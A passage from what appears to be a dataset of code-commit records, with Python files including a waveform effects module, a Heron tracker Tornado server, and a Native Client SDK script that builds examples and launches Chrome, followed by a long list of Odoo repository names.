base = self.backend_base
for key in itertools.chain(base.__all__, ('validate', 'setup')):
if inspect.ismethod(getattr(base, key)):
context[key] = (lambda f: lambda *a, **k: getattr(self, f)(*a, **k))(key)
else:
context[key] = getattr(base, key)
| apache-2.0 | Python |
|
e204dd02b44066b28d09c0143cdeec557ff420fd | add a module for effects that can be applied to waveforms | fretboardfreak/potty_oh,fretboardfreak/potty_oh | potty_oh/effects.py | potty_oh/effects.py | # Copyright 2016 Curtis Sand
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""effects.py: a library of effects to apply to waveforms."""
from matplotlib import pyplot
from .waveform import Waveform
def normalize(waveform):
if isinstance(waveform, Waveform):
wavedata = waveform.frames
else:
wavedata = waveform
peak = max(wavedata)
wavedata *= 1.0 / peak
return wavedata
| apache-2.0 | Python |
|
b9a8d24048a5c5b83a996f9fb1b2b07857a56db0 | unwind the changes to tracker main | moomou/heron,cs564/heron,srkukarni/heron,srkukarni/heron,objmagic/heron,wangli1426/heron,zhangzhonglai/heron,lewiskan/heron,streamlio/heron,huijunwu/heron,srkukarni/heron,zhangzhonglai/heron,lukess/heron,tomncooper/heron,nlu90/heron,ashvina/heron,tomncooper/heron,cs564/heron,nlu90/heron,streamlio/heron,twitter/heron,huijunwu/heron,objmagic/heron,tomncooper/heron,lewiskan/heron,billonahill/heron,twitter/heron,objmagic/heron,lucperkins/heron,huijunwu/heron,tomncooper/heron,cliffyg/heron,mycFelix/heron,srkukarni/heron,moomou/heron,ashvina/heron,billonahill/heron,nlu90/heron,moomou/heron,billonahill/heron,cs564/heron,srkukarni/heron,lukess/heron,lucperkins/heron,lewiskan/heron,cs564/heron,cliffyg/heron,cliffyg/heron,lukess/heron,zhangzhonglai/heron,cliffyg/heron,ashvina/heron,mycFelix/heron,moomou/heron,lucperkins/heron,mycFelix/heron,streamlio/heron,lewiskan/heron,tomncooper/heron,lucperkins/heron,twitter/heron,tomncooper/heron,wangli1426/heron,srkukarni/heron,moomou/heron,moomou/heron,cliffyg/heron,billonahill/heron,wangli1426/heron,objmagic/heron,lukess/heron,billonahill/heron,lucperkins/heron,moomou/heron,cs564/heron,zhangzhonglai/heron,wangli1426/heron,objmagic/heron,ashvina/heron,ashvina/heron,streamlio/heron,cliffyg/heron,mycFelix/heron,lewiskan/heron,billonahill/heron,wangli1426/heron,streamlio/heron,zhangzhonglai/heron,srkukarni/heron,ashvina/heron,billonahill/heron,moomou/heron,lucperkins/heron,zhangzhonglai/heron,tomncooper/heron,streamlio/heron,zhangzhonglai/heron,cs564/heron,cs564/heron,cliffyg/heron,huijunwu/heron,ashvina/heron,nlu90/heron,zhangzhonglai/heron,nlu90/heron,cliffyg/heron,wangli1426/heron,lucperkins/heron,lukess/heron,wangli1426/heron,mycFelix/heron,ashvina/heron,moomou/heron,tomncooper/heron,lukess/heron,twitter/heron,nlu90/heron,twitter/heron,srkukarni/heron,mycFelix/heron,objmagic/heron,lewiskan/heron,nlu90/heron,lewiskan/heron,lukess/heron,zhangzhonglai/heron,wangli1426/heron,huijunwu/heron,wangli1426/heron,mycFelix/heron,cliffyg/heron,tomncooper/heron,streamlio/heron,streamlio/heron,twitter/heron,mycFelix/heron,huijunwu/heron,huijunwu/heron,billonahill/heron,ashvina/heron,lewiskan/heron,nlu90/heron,mycFelix/heron,cs564/heron,objmagic/heron,lucperkins/heron,lukess/heron,nlu90/heron,lukess/heron,objmagic/heron,huijunwu/heron,streamlio/heron,cs564/heron,twitter/heron,objmagic/heron,billonahill/heron,twitter/heron,lewiskan/heron | heron/tracker/src/python/main.py | heron/tracker/src/python/main.py | import os
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.escape import json_encode, utf8
from tornado.options import define, options
from heron.tracker.src.python import handlers
from heron.tracker.src.python import log
from heron.tracker.src.python.log import Log as LOG
from heron.tracker.src.python.tracker import Tracker
define("stateconf", default='zkstateconf', help="Yaml config file without extension for state locations")
define("port", default=8888, type=int, help="HTTP port to run the Tracker")
class Application(tornado.web.Application):
def __init__(self):
tracker = Tracker()
self.tracker = tracker
tracker.synch_topologies(options.stateconf)
tornadoHandlers = [
(r"/", handlers.MainHandler),
(r"/topologies", handlers.TopologiesHandler, {"tracker":tracker}),
(r"/topologies/states", handlers.StatesHandler, {"tracker":tracker}),
(r"/topologies/info", handlers.TopologyHandler, {"tracker":tracker}),
(r"/topologies/logicalplan", handlers.LogicalPlanHandler, {"tracker":tracker}),
(r"/topologies/physicalplan", handlers.PhysicalPlanHandler, {"tracker":tracker}),
(r"/topologies/executionstate", handlers.ExecutionStateHandler, {"tracker":tracker}),
(r"/topologies/metrics", handlers.MetricsHandler, {"tracker":tracker}),
(r"/topologies/metricstimeline", handlers.MetricsTimelineHandler, {"tracker":tracker}),
(r"/topologies/metricsquery", handlers.MetricsQueryHandler, {"tracker":tracker}),
(r"/topologies/exceptions", handlers.ExceptionHandler, {"tracker":tracker}),
(r"/topologies/exceptionsummary", handlers.ExceptionSummaryHandler, {"tracker":tracker}),
(r"/machines", handlers.MachinesHandler, {"tracker":tracker}),
(r"/topologies/pid", handlers.PidHandler, {"tracker":tracker}),
(r"/topologies/jstack", handlers.JstackHandler, {"tracker":tracker}),
(r"/topologies/jmap", handlers.JmapHandler, {"tracker":tracker}),
(r"/topologies/histo", handlers.MemoryHistogramHandler, {"tracker":tracker}),
(r"(.*)", handlers.DefaultHandler),
]
settings = dict(
static_path=os.path.dirname(__file__)
)
tornado.web.Application.__init__(self, tornadoHandlers, **settings)
def main():
log.configure(log.logging.DEBUG)
options.parse_command_line()
port = options.port
LOG.info("Running on port: " + str(port))
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
| import os
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.escape import json_encode, utf8
from tornado.options import define, options
from heron.tracker.src.python import handlers
from heron.tracker.src.python import log
from heron.tracker.src.python.log import Log as LOG
from heron.tracker.src.python.tracker import Tracker
define("stateconf", default='filestateconf', help="Yaml config file without extension for state locations")
define("port", default=8888, type=int, help="HTTP port to run the Tracker")
class Application(tornado.web.Application):
def __init__(self):
tracker = Tracker()
self.tracker = tracker
tracker.synch_topologies(options.stateconf)
tornadoHandlers = [
(r"/", handlers.MainHandler),
(r"/topologies", handlers.TopologiesHandler, {"tracker":tracker}),
(r"/topologies/states", handlers.StatesHandler, {"tracker":tracker}),
(r"/topologies/info", handlers.TopologyHandler, {"tracker":tracker}),
(r"/topologies/logicalplan", handlers.LogicalPlanHandler, {"tracker":tracker}),
(r"/topologies/physicalplan", handlers.PhysicalPlanHandler, {"tracker":tracker}),
(r"/topologies/executionstate", handlers.ExecutionStateHandler, {"tracker":tracker}),
(r"/topologies/metrics", handlers.MetricsHandler, {"tracker":tracker}),
(r"/topologies/metricstimeline", handlers.MetricsTimelineHandler, {"tracker":tracker}),
(r"/topologies/metricsquery", handlers.MetricsQueryHandler, {"tracker":tracker}),
(r"/topologies/exceptions", handlers.ExceptionHandler, {"tracker":tracker}),
(r"/topologies/exceptionsummary", handlers.ExceptionSummaryHandler, {"tracker":tracker}),
(r"/machines", handlers.MachinesHandler, {"tracker":tracker}),
(r"/topologies/pid", handlers.PidHandler, {"tracker":tracker}),
(r"/topologies/jstack", handlers.JstackHandler, {"tracker":tracker}),
(r"/topologies/jmap", handlers.JmapHandler, {"tracker":tracker}),
(r"/topologies/histo", handlers.MemoryHistogramHandler, {"tracker":tracker}),
(r"(.*)", handlers.DefaultHandler),
]
settings = dict(
static_path=os.path.dirname(__file__)
)
tornado.web.Application.__init__(self, tornadoHandlers, **settings)
def main():
log.configure(log.logging.DEBUG)
options.parse_command_line()
port = options.port
LOG.info("Running on port: " + str(port))
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
| apache-2.0 | Python |
3a6d41d8123b27ca5b22f7d7630e40faef3595c1 | Add a top-level script that replaces the top-level makefile. | sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk | examples/run.py | examples/run.py | #!/usr/bin/python
#
# Copyright 2010, The Native Client SDK Authors. All Rights Reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
#
"""Build and run the SDK examples.
This script tries to find an installed version of the Chrome Browser that can
run the SDK examples. If such a version is installed, it builds the publish
versions of each example, then launches a local http server. It then runs
the installed verison of the Chrome Browser, open to the URL of the requested
example.
Options:
--chrome-path=<abs_path> Absolute path to the Chrome Browser used to run
the examples.
--example=<example> Run |example|. Possible values are: hello_world,
pi_generator and tumbler.
"""
import getopt
import os
import subprocess
import sys
import urllib
help_message = '''
--chrome-path=<abs_path> Absolute path to the Chrome Browser used to run the
examples.
--example=<example> Runs the selected example. Possible values are:
hello_world, pi_generator, tumbler.
'''
DEFAULT_CHROME_INSTALL_PATH_MAP = {
'win32': r'c:\AppData\Local\Chromium\Application',
'cygwin': r'c:\cygwin\bin',
'linux': '/opt/google/chrome',
'linux2': '/opt/google/chrome',
'darwin': '/Applications'
}
CHROME_EXECUTABLE_MAP = {
'win32': 'chrome.exe',
'cygwin': 'chrome.exe',
'linux': 'chrome',
'linux2': 'chrome',
'darwin': 'Chromium.app/Contents/MacOS/Chromium'
}
PLATFORM_COLLAPSE = {
'win32': 'win32',
'cygwin': 'win32',
'linux': 'linux',
'linux2': 'linux',
'darwin': 'mac',
}
SERVER_PORT = 5103
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
# Look for a Google Chrome executable in the given install path. If
# |chrome_install_path| is |None|, then the platform-specific install path is
# used. Returns the 2-tuple whose elements are:
# the actual install path used (which might be the default)
# the full path to the executable
# If Google Chrome can't be found, then the 2-tuple returned is:
# the actual install path searched
# None
def FindChrome(chrome_install_path=None):
if chrome_install_path is None:
# Use the platform-specific default path for Chrome.
chrome_install_path = DEFAULT_CHROME_INSTALL_PATH_MAP[sys.platform]
chrome_exec = CHROME_EXECUTABLE_MAP[sys.platform]
full_chrome_path = os.path.join(chrome_install_path, chrome_exec)
if os.path.exists(full_chrome_path):
return chrome_install_path, full_chrome_path
return chrome_install_path, None
# Checks to see if there is a simple HTTP server running on |SERVER_PORT|. Do
# this by attempting to open a URL socket on localhost:|SERVER_PORT|.
def IsHTTPServerRunning():
is_running = False
try:
url = urllib.urlopen('http://localhost:%d' % SERVER_PORT)
is_running = True
except IOError:
is_running = False
return is_running
def main(argv=None):
if argv is None:
argv = sys.argv
chrome_install_path = os.environ.get('CHROME_INSTALL_PATH', None)
example = 'hello_world'
try:
try:
opts, args = getopt.getopt(argv[1:], 'ho:p:v',
['help', 'example=', 'chrome-path='])
except getopt.error, msg:
raise Usage(msg)
# option processing
for option, value in opts:
if option == '-v':
verbose = True
if option in ('-h', '--help'):
raise Usage(help_message)
if option in ('-e', '--example'):
example = value
if option in ('-p', '--chrome-path'):
chrome_install_path = value
except Usage, err:
print >> sys.stderr, sys.argv[0].split('/')[-1] + ': ' + str(err.msg)
print >> sys.stderr, '--help Print this help message.'
return 2
# Look for an installed version of the Chrome Browser. The default path
# is platform-dependent, and can be set with the --chrome-path= option.
chrome_install_path, chrome_exec = FindChrome(chrome_install_path)
if chrome_exec is None:
print >> sys.stderr, 'Can\'t find Google Chrome in path \"%s\"' % \
chrome_install_path
return 2
print 'Using Google Chrome found at: ', chrome_exec
env = os.environ.copy()
if sys.platform == 'win32':
env['PATH'] = r'c:\cygwin\bin;' + env['PATH']
# Build the examples.
make = subprocess.Popen('make publish', env=env, shell=True)
make_err = make.communicate()[1]
# Run the local http server, if it isn't already running.
if not IsHTTPServerRunning():
home_dir = os.path.realpath(os.curdir)
subprocess.Popen('python ./httpd.py', cwd=home_dir, shell=True)
else:
print 'localhost HTTP server is running.'
# Launch Google Chrome with the desired example.
example_url = 'http://localhost:%(server_port)s/publish/' \
'%(platform)s_%(target)s/%(example)s.html'
subprocess.Popen(chrome_exec + ' --enable-nacl ' +
example_url % ({'server_port':SERVER_PORT,
'platform':PLATFORM_COLLAPSE[sys.platform],
'target':'x86',
'example':example}),
env=env,
shell=True)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python |
|
451e8f3ea4765051088ea1c84f81e32691591d89 | Create __init__.py | simonlovgren/maustrobot | core/__init__.py | core/__init__.py | #!/usr/bin/env python
| mit | Python |
|
65aa1424f7ea8e184180d93e790b1ece6705775d | fix missing coma | ccomb/OpenUpgrade,wangjun/odoo,dsfsdgsbngfggb/odoo,dezynetechnologies/odoo,NL66278/OCB,BT-rmartin/odoo,havt/odoo,florentx/OpenUpgrade,bkirui/odoo,funkring/fdoo,gorjuce/odoo,apanju/GMIO_Odoo,massot/odoo,demon-ru/iml-crm,grap/OpenUpgrade,jiachenning/odoo,makinacorpus/odoo,eino-makitalo/odoo,highco-groupe/odoo,JCA-Developpement/Odoo,provaleks/o8,stephen144/odoo,rowemoore/odoo,matrixise/odoo,VielSoft/odoo,xujb/odoo,shivam1111/odoo,alhashash/odoo,elmerdpadilla/iv,leorochael/odoo,odootr/odoo,oasiswork/odoo,Gitlab11/odoo,srsman/odoo,nhomar/odoo,slevenhagen/odoo,leorochael/odoo,ThinkOpen-Solutions/odoo,blaggacao/OpenUpgrade,nhomar/odoo-mirror,Ernesto99/odoo,numerigraphe/odoo,joshuajan/odoo,Endika/OpenUpgrade,abdellatifkarroum/odoo,inspyration/odoo,christophlsa/odoo,poljeff/odoo,stonegithubs/odoo,storm-computers/odoo,alhashash/odoo,pedrobaeza/OpenUpgrade,kirca/OpenUpgrade,idncom/odoo,bplancher/odoo,factorlibre/OCB,jiachenning/odoo,apocalypsebg/odoo,ingadhoc/odoo,blaggacao/OpenUpgrade,ygol/odoo,doomsterinc/odoo,odoousers2014/odoo,funkring/fdoo,colinnewell/odoo,abstract-open-solutions/OCB,takis/odoo,fgesora/odoo,provaleks/o8,osvalr/odoo,Elico-Corp/odoo_OCB,abstract-open-solutions/OCB,agrista/odoo-saas,fgesora/odoo,markeTIC/OCB,tangyiyong/odoo,colinnewell/odoo,prospwro/odoo,sebalix/OpenUpgrade,brijeshkesariya/odoo,leoliujie/odoo,bguillot/OpenUpgrade,blaggacao/OpenUpgrade,lsinfo/odoo,jaxkodex/odoo,kybriainfotech/iSocioCRM,minhtuancn/odoo,gsmartway/odoo,janocat/odoo,PongPi/isl-odoo,x111ong/odoo,mkieszek/odoo,jesramirez/odoo,storm-computers/odoo,dariemp/odoo,fjbatresv/odoo,JonathanStein/odoo,JonathanStein/odoo,savoirfairelinux/OpenUpgrade,abdellatifkarroum/odoo,Ichag/odoo,christophlsa/odoo,bkirui/odoo,tvtsoft/odoo8,ThinkOpen-Solutions/odoo,addition-it-solutions/project-all,x111ong/odoo,omprakasha/odoo,tvibliani/odoo,avoinsystems/odoo,goliveirab/odoo,alexcuellar/odoo,juanalfonsopr/odoo,windedge/odoo,papouso/odoo,jiangzhixiao/odoo,Antiun/odoo,wangjun/odoo,bwrsandman/OpenUpgrade,jaxkodex/odoo,thanhacun/odoo,feroda/odoo,ramadhane/odoo,highco-groupe/odoo,JGarcia-Panach/odoo,kifcaliph/odoo,jfpla/odoo,jiangzhixiao/odoo,lombritz/odoo,nhomar/odoo,gvb/odoo,fdvarela/odoo8,mustafat/odoo-1,waytai/odoo,slevenhagen/odoo-npg,lombritz/odoo,florian-dacosta/OpenUpgrade,kirca/OpenUpgrade,odootr/odoo,brijeshkesariya/odoo,syci/OCB,ehirt/odoo,bkirui/odoo,kifcaliph/odoo,nhomar/odoo,hanicker/odoo,naousse/odoo,christophlsa/odoo,gavin-feng/odoo,brijeshkesariya/odoo,Ernesto99/odoo,NeovaHealth/odoo,mlaitinen/odoo,javierTerry/odoo,charbeljc/OCB,slevenhagen/odoo-npg,sebalix/OpenUpgrade,luiseduardohdbackup/odoo,tvibliani/odoo,ccomb/OpenUpgrade,havt/odoo,realsaiko/odoo,ingadhoc/odoo,janocat/odoo,nagyistoce/odoo-dev-odoo,zchking/odoo,Endika/OpenUpgrade,osvalr/odoo,rdeheele/odoo,ChanduERP/odoo,collex100/odoo,spadae22/odoo,QianBIG/odoo,NL66278/OCB,hoatle/odoo,arthru/OpenUpgrade,dllsf/odootest,florian-dacosta/OpenUpgrade,gvb/odoo,tangyiyong/odoo,ojengwa/odoo,rubencabrera/odoo,ecosoft-odoo/odoo,kirca/OpenUpgrade,nexiles/odoo,Eric-Zhong/odoo,joshuajan/odoo,provaleks/o8,alexteodor/odoo,n0m4dz/odoo,OpusVL/odoo,fevxie/odoo,aviciimaxwell/odoo,draugiskisprendimai/odoo,collex100/odoo,OpenUpgrade-dev/OpenUpgrade,ovnicraft/odoo,dalegregory/odoo,diagramsoftware/odoo,matrixise/odoo,nuuuboo/odoo,ehirt/odoo,lightcn/odoo,ApuliaSoftware/odoo,alexteodor/odoo,CopeX/odoo,incaser/odoo-odoo,deKupini/erp,oihane/odoo,rahuldhote/odoo,glovebx/odoo,tinkhaven-organization/odoo,Kilhog/odoo,pedrobaeza/OpenUpgrade,OpenUpgrade/OpenUpgrade,jfpla/odoo,sve-odoo/odoo,CubicERP/odoo,alqfahad/odoo,JGarcia-Panach/odoo,srsman/odoo,collex100/odoo,lgscofield/odoo,nuuuboo/odoo,n0m4dz/odoo,oasiswork/odoo,Nowheresly/odoo,BT-rmartin/odoo,leoliujie/odoo,juanalfonsopr/odoo,inspyration/odoo,bkirui/odoo,shaufi10/odoo,dalegregory/odoo,thanhacun/odoo,Endika/odoo,sysadminmatmoz/OCB,osvalr/odoo,jiachenning/odoo,andreparames/odoo,0k/odoo,vnsofthe/odoo,hifly/OpenUpgrade,SAM-IT-SA/odoo,rgeleta/odoo,apanju/GMIO_Odoo,ecosoft-odoo/odoo,Ernesto99/odoo,jeasoft/odoo,ovnicraft/odoo,ehirt/odoo,ojengwa/odoo,mszewczy/odoo,OpenUpgrade-dev/OpenUpgrade,apanju/odoo,ecosoft-odoo/odoo,kittiu/odoo,idncom/odoo,fjbatresv/odoo,cedk/odoo,aviciimaxwell/odoo,goliveirab/odoo,ChanduERP/odoo,ovnicraft/odoo,CopeX/odoo,BT-fgarbely/odoo,rgeleta/odoo,janocat/odoo,ygol/odoo,apocalypsebg/odoo,leoliujie/odoo,mvaled/OpenUpgrade,RafaelTorrealba/odoo,Codefans-fan/odoo,Antiun/odoo,lightcn/odoo,bobisme/odoo,takis/odoo,patmcb/odoo,odoo-turkiye/odoo,gorjuce/odoo,datenbetrieb/odoo,lombritz/odoo,sadleader/odoo,florian-dacosta/OpenUpgrade,prospwro/odoo,lightcn/odoo,RafaelTorrealba/odoo,PongPi/isl-odoo,CatsAndDogsbvba/odoo,BT-ojossen/odoo,vnsofthe/odoo,synconics/odoo,n0m4dz/odoo,pplatek/odoo,tinkerthaler/odoo,mmbtba/odoo,mlaitinen/odoo,joariasl/odoo,slevenhagen/odoo,savoirfairelinux/odoo,dariemp/odoo,realsaiko/odoo,apanju/GMIO_Odoo,jesramirez/odoo,oihane/odoo,ujjwalwahi/odoo,stonegithubs/odoo,guerrerocarlos/odoo,MarcosCommunity/odoo,sinbazhou/odoo,incaser/odoo-odoo,ujjwalwahi/odoo,Grirrane/odoo,gvb/odoo,windedge/odoo,chiragjogi/odoo,NeovaHealth/odoo,ojengwa/odoo,mkieszek/odoo,hip-odoo/odoo,mlaitinen/odoo,lgscofield/odoo,odoousers2014/odoo,n0m4dz/odoo,syci/OCB,klunwebale/odoo,luistorresm/odoo,simongoffin/website_version,NeovaHealth/odoo,cedk/odoo,Bachaco-ve/odoo,pedrobaeza/OpenUpgrade,nuuuboo/odoo,xujb/odoo,AuyaJackie/odoo,chiragjogi/odoo,diagramsoftware/odoo,Adel-Magebinary/odoo,Grirrane/odoo,juanalfonsopr/odoo,bwrsandman/OpenUpgrade,mszewczy/odoo,nexiles/odoo,havt/odoo,oihane/odoo,fossoult/odoo,osvalr/odoo,jaxkodex/odoo,mmbtba/odoo,SerpentCS/odoo,hmen89/odoo,syci/OCB,Ernesto99/odoo,sadleader/odoo,lightcn/odoo,alexcuellar/odoo,nuuuboo/odoo,aviciimaxwell/odoo,CatsAndDogsbvba/odoo,arthru/OpenUpgrade,rdeheele/odoo,OpenUpgrade/OpenUpgrade,tarzan0820/odoo,nhomar/odoo-mirror,fgesora/odoo,poljeff/odoo,steedos/odoo,mlaitinen/odoo,mlaitinen/odoo,mustafat/odoo-1,acshan/odoo,OpusVL/odoo,QianBIG/odoo,alexteodor/odoo,cysnake4713/odoo,bwrsandman/OpenUpgrade,poljeff/odoo,minhtuancn/odoo,naousse/odoo,CopeX/odoo,wangjun/odoo,jaxkodex/odoo,SAM-IT-SA/odoo,bkirui/odoo,thanhacun/odoo,lgscofield/odoo,lightcn/odoo,PongPi/isl-odoo,salaria/odoo,CubicERP/odoo,jiangzhixiao/odoo,fgesora/odoo,nitinitprof/odoo,waytai/odoo,oihane/odoo,Endika/odoo,hip-odoo/odoo,lombritz/odoo,bobisme/odoo,nexiles/odoo,tinkhaven-organization/odoo,mmbtba/odoo,mkieszek/odoo,gsmartway/odoo,Ichag/odoo,prospwro/odoo,VielSoft/odoo,srsman/odoo,ujjwalwahi/odoo,tvtsoft/odoo8,nuncjo/odoo,ihsanudin/odoo,feroda/odoo,bakhtout/odoo-educ,kittiu/odoo,dllsf/odootest,oliverhr/odoo,rubencabrera/odoo,apanju/GMIO_Odoo,bakhtout/odoo-educ,mvaled/OpenUpgrade,demon-ru/iml-crm,Endika/OpenUpgrade,mkieszek/odoo,xzYue/odoo,odooindia/odoo,ccomb/OpenUpgrade,joariasl/odoo,dfang/odoo,BT-ojossen/odoo,steedos/odoo,fdvarela/odoo8,alexcuellar/odoo,prospwro/odoo,abdellatifkarroum/odoo,AuyaJackie/odoo,hoatle/odoo,ShineFan/odoo,BT-astauder/odoo,odooindia/odoo,windedge/odoo,JGarcia-Panach/odoo,ojengwa/odoo,ihsanudin/odoo,Endika/OpenUpgrade,shaufi/odoo,srimai/odoo,Danisan/odoo-1,shaufi10/odoo,Ernesto99/odoo,jiangzhixiao/odoo,PongPi/isl-odoo,x111ong/odoo,srimai/odoo,ingadhoc/odoo,jpshort/odoo,jiachenning/odoo,spadae22/odoo,andreparames/odoo,shingonoide/odoo,rdeheele/odoo,cloud9UG/odoo,ubic135/odoo-design,hmen89/odoo,JonathanStein/odoo,OpenUpgrade/OpenUpgrade,mmbtba/odoo,simongoffin/website_version,oasiswork/odoo,highco-groupe/odoo,Daniel-CA/odoo,numerigraphe/odoo,christophlsa/odoo,odoousers2014/odoo,Drooids/odoo,tangyiyong/odoo,glovebx/odoo,fossoult/odoo,sve-odoo/odoo,sv-dev1/odoo,tinkhaven-organization/odoo,lsinfo/odoo,sinbazhou/odoo,sinbazhou/odoo,Drooids/odoo,datenbetrieb/odoo,BT-astauder/odoo,fuhongliang/odoo,oasiswork/odoo,shivam1111/odoo,idncom/odoo,fjbatresv/odoo,numerigraphe/odoo,florian-dacosta/OpenUpgrade,abstract-open-solutions/OCB,steedos/odoo,incaser/odoo-odoo,deKupini/erp,sysadminmatmoz/OCB,Kilhog/odoo,acshan/odoo,Eric-Zhong/odoo,RafaelTorrealba/odoo,Danisan/odoo-1,gvb/odoo,BT-rmartin/odoo,vnsofthe/odoo,sinbazhou/odoo,avoinsystems/odoo,kifcaliph/odoo,aviciimaxwell/odoo,omprakasha/odoo,odooindia/odoo,NeovaHealth/odoo,numerigraphe/odoo,OpusVL/odoo,javierTerry/odoo,nexiles/odoo,xzYue/odoo,sysadminmatmoz/OCB,Gitlab11/odoo,odooindia/odoo,GauravSahu/odoo,bakhtout/odoo-educ,microcom/odoo,diagramsoftware/odoo,guerrerocarlos/odoo,dezynetechnologies/odoo,tangyiyong/odoo,rubencabrera/odoo,shivam1111/odoo,BT-fgarbely/odoo,tarzan0820/odoo,numerigraphe/odoo,papouso/odoo,lsinfo/odoo,MarcosCommunity/odoo,sinbazhou/odoo,cpyou/odoo,CopeX/odoo,glovebx/odoo,JonathanStein/odoo,Gitlab11/odoo,agrista/odoo-saas,idncom/odoo,optima-ict/odoo,mustafat/odoo-1,dkubiak789/odoo,savoirfairelinux/odoo,Codefans-fan/odoo,fjbatresv/odoo,joariasl/odoo,dkubiak789/odoo,gsmartway/odoo,chiragjogi/odoo,Nick-OpusVL/odoo,bwrsandman/OpenUpgrade,nexiles/odoo,christophlsa/odoo,lombritz/odoo,ehirt/odoo,srimai/odoo,synconics/odoo,fossoult/odoo,tinkerthaler/odoo,christophlsa/odoo,QianBIG/odoo,slevenhagen/odoo,ChanduERP/odoo,csrocha/OpenUpgrade,bwrsandman/OpenUpgrade,feroda/odoo,windedge/odoo,christophlsa/odoo,kirca/OpenUpgrade,avoinsystems/odoo,hmen89/odoo,sergio-incaser/odoo,Eric-Zhong/odoo,luistorresm/odoo,abstract-open-solutions/OCB,nagyistoce/odoo-dev-odoo,idncom/odoo,hifly/OpenUpgrade,oliverhr/odoo,hoatle/odoo,ShineFan/odoo,SAM-IT-SA/odoo,Bachaco-ve/odoo,gorjuce/odoo,damdam-s/OpenUpgrade,mszewczy/odoo,xujb/odoo,tinkhaven-organization/odoo,leorochael/odoo,AuyaJackie/odoo,TRESCLOUD/odoopub,jfpla/odoo,apanju/odoo,prospwro/odoo,oliverhr/odoo,GauravSahu/odoo,abdellatifkarroum/odoo,gorjuce/odoo,papouso/odoo,jusdng/odoo,damdam-s/OpenUpgrade,datenbetrieb/odoo,0k/OpenUpgrade,dgzurita/odoo,xujb/odoo,BT-fgarbely/odoo,feroda/odoo,ClearCorp-dev/odoo,realsaiko/odoo,colinnewell/odoo,TRESCLOUD/odoopub,salaria/odoo,bakhtout/odoo-educ,luistorresm/odoo,zchking/odoo,fevxie/odoo,draugiskisprendimai/odoo,Noviat/odoo,dllsf/odootest,ShineFan/odoo,patmcb/odoo,jeasoft/odoo,fossoult/odoo,Danisan/odoo-1,fevxie/odoo,Nowheresly/odoo,n0m4dz/odoo,gavin-feng/odoo,rowemoore/odoo,bwrsandman/OpenUpgrade,VielSoft/odoo,papouso/odoo,damdam-s/OpenUpgrade,0k/odoo,cysnake4713/odoo,goliveirab/odoo,provaleks/o8,luistorresm/odoo,ojengwa/odoo,odootr/odoo,Daniel-CA/odoo,dalegregory/odoo,tvibliani/odoo,klunwebale/odoo,hbrunn/OpenUpgrade,jiangzhixiao/odoo,dkubiak789/odoo,stonegithubs/odoo,factorlibre/OCB,makinacorpus/odoo,nhomar/odoo-mirror,havt/odoo,n0m4dz/odoo,eino-makitalo/odoo,papouso/odoo,elmerdpadilla/iv,odootr/odoo,storm-computers/odoo,pplatek/odoo,florentx/OpenUpgrade,brijeshkesariya/odoo,damdam-s/OpenUpgrade,prospwro/odoo,javierTerry/odoo,grap/OpenUpgrade,NeovaHealth/odoo,TRESCLOUD/odoopub,mszewczy/odoo,sv-dev1/odoo,CopeX/odoo,nitinitprof/odoo,MarcosCommunity/odoo,ccomb/OpenUpgrade,hubsaysnuaa/odoo,florentx/OpenUpgrade,gvb/odoo,jusdng/odoo,kirca/OpenUpgrade,shingonoide/odoo,BT-fgarbely/odoo,virgree/odoo,nhomar/odoo,acshan/odoo,chiragjogi/odoo,ingadhoc/odoo,ccomb/OpenUpgrade,ThinkOpen-Solutions/odoo,juanalfonsopr/odoo,FlorianLudwig/odoo,0k/OpenUpgrade,luistorresm/odoo,factorlibre/OCB,OpenUpgrade/OpenUpgrade,synconics/odoo,joariasl/odoo,windedge/odoo,microcom/odoo,Grirrane/odoo,BT-ojossen/odoo,Nick-OpusVL/odoo,csrocha/OpenUpgrade,sebalix/OpenUpgrade,alhashash/odoo,savoirfairelinux/odoo,lsinfo/odoo,KontorConsulting/odoo,ClearCorp-dev/odoo,stonegithubs/odoo,cedk/odoo,dsfsdgsbngfggb/odoo,jusdng/odoo,doomsterinc/odoo,hopeall/odoo,sv-dev1/odoo,ihsanudin/odoo,synconics/odoo,Elico-Corp/odoo_OCB,csrocha/OpenUpgrade,poljeff/odoo,glovebx/odoo,slevenhagen/odoo,jfpla/odoo,optima-ict/odoo,massot/odoo,dkubiak789/odoo,BT-astauder/odoo,CubicERP/odoo,massot/odoo,ApuliaSoftware/odoo,markeTIC/OCB,wangjun/odoo,matrixise/odoo,hifly/OpenUpgrade,rgeleta/odoo,ApuliaSoftware/odoo,alqfahad/odoo,dfang/odoo,collex100/odoo,blaggacao/OpenUpgrade,alexteodor/odoo,shivam1111/odoo,cedk/odoo,alqfahad/odoo,srsman/odoo,arthru/OpenUpgrade,addition-it-solutions/project-all,KontorConsulting/odoo,guewen/OpenUpgrade,gavin-feng/odoo,patmcb/odoo,PongPi/isl-odoo,odootr/odoo,massot/odoo,bobisme/odoo,mmbtba/odoo,ojengwa/odoo,ThinkOpen-Solutions/odoo,hip-odoo/odoo,KontorConsulting/odoo,tarzan0820/odoo,fevxie/odoo,florentx/OpenUpgrade,dalegregory/odoo,xzYue/odoo,lombritz/odoo,omprakasha/odoo,jiangzhixiao/odoo,Eric-Zhong/odoo,javierTerry/odoo,jesramirez/odoo,shaufi10/odoo,naousse/odoo,bealdav/OpenUpgrade,CatsAndDogsbvba/odoo,joshuajan/odoo,markeTIC/OCB,doomsterinc/odoo,dalegregory/odo